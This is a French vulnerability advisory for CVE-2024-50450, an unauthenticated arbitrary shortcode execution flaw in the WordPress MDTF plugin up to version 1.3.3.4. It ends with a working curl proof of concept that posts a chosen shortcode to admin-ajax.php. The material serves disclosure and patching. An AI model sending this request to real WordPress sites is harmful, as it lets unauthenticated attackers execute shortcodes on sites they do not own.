
WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Exécution arbitraire de shortcode non authentifiée
WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Exécution non authentifiée de shortcodes arbitraires
Le plugin MDTF – Meta Data and Taxonomies Filter pour WordPress est vulnérable à l'exécution arbitraire de shortcodes dans toutes les versions jusqu'à la version 1.3.3.4 incluse. Cela est dû au fait que le logiciel permet aux utilisateurs d'exécuter une action qui ne valide pas correctement une valeur avant d'exécuter do_shortcode. Cela rend possible pour des attaquants non authentifiés d'exécuter des shortcodes arbitraires.
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50450
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSS Score: 7.3
Slugs: wp-meta-data-filter-and-taxonomy-filter
Remplacez [contact_7] par le shortcode que vous souhaitez exécuter.
curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=mdf_get_ajax_auto_recount_data" \
-d "mdf_front_qtrans_lang=en" \
-d "mdf_front_wpml_lang=en" \
-d "mdf_is_search_going=1" \
-d "mdf_tmp_order=asc" \
-d "mdf_tmp_orderby=date" \
-d "no_wp_die=true" \
-d "mdf_ajax_request=true" \
-d "mdf_cat=category_slug" \
-d "page_mdf=1" \
-d "slug=page_slug" \
-d "type=shortcode" \
-d "shortcode_id=shortcode_id_value" \
-d "mdf_ajax_content_redraw=true" \
-d "shortcode_txt=[contact_7]" \
http://kubernetes.docker.internal/wp-admin/admin-ajax.php